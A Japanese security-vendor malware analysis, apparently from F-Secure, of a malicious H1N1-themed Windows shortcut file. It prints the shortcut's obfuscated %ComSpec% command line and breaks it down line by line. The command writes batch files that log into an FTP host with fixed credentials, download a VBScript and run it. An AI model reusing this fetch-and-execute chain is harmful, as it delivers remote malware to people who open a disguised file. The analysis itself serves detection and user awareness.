我々は「H1N1」新型インフルエンザをエサにした、新たなマルウェアと遭遇した。

  これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。

  以下が、このファイルの外観だ(md5: d17e956522f83995654666c0f2343797)。

h1n1

  コマンドプロンプトからこのファイルを見ると、1987バイトの無害なショートカットに見える。

h1n1

  しかしコンテンツを見ると、何だかおかしな様子なのが分かるだろう:

h1n1

  このショートカットのプロパティを見てみよう:

h1n1

  これは「%ComSpec%」にリンクしているのだろうか? あまり良い感じはしない。このショートカットのリンク先をコピー&ペーストしてみよう:

h1n1

  よく分からない。

  では、何をしているかを見るため、これをより小さな部分に分割してみよう:

     %ComSpec% /c                         // Executes command prompt to run the next commands
     set h=p -                            // sets variable "h" as "p ?"
     set j=ge                             // Sets variable "j" as "ge"
     set s=.g03z.                         // sets variable "s" as ".g03z."
     echo echo o www%s%com^>t>b.bat       // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
     call b.bat                           // calls the newly created b.bat
     echo aa33>>t                         // writes "aa33" to file called t
     echo bb33>>t                         // writes "bb33" to file called t
     echo echo %j%t p p.vbs^>^>t>>c       // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
     echo echo bye^>^>t>>c                // writes "echo bye>>t" to file called c
     echo ft%h%s:t>>c                     // writes "ft%h%s:t" to file called c - that's "ftp"
     echo start p.vbs>>c                  // writes "start p.vbs" to file called c
     ren c h.bat                          // renames c to h.bat
     call h.bat                           // calls h.bat

  このショートカットをクリックすると、結果として、あなたのマシンは以下のことをすることになる:

  • 「www.g03z.com」という名称のFTPサイトに接続
  • ユーザー名「aa33」、パスワード「bb33」でログイン
  • 「p.vbs」という名称のスクリプトをダウンロード
  • スクリプトを実行


  では、「g03z.com」のオーナーは誰だろう? なるほど、ミスター「Zzzzggg」というわけだ:

h1n1

  同ドメインはまだ存在するが、ファイル「p.vbs」は現在サーバに見あたらない。よって現状では何ごとも起こらない。

  エフセキュアの製品はこの悪意あるショートカットを検出し、ブロックしている。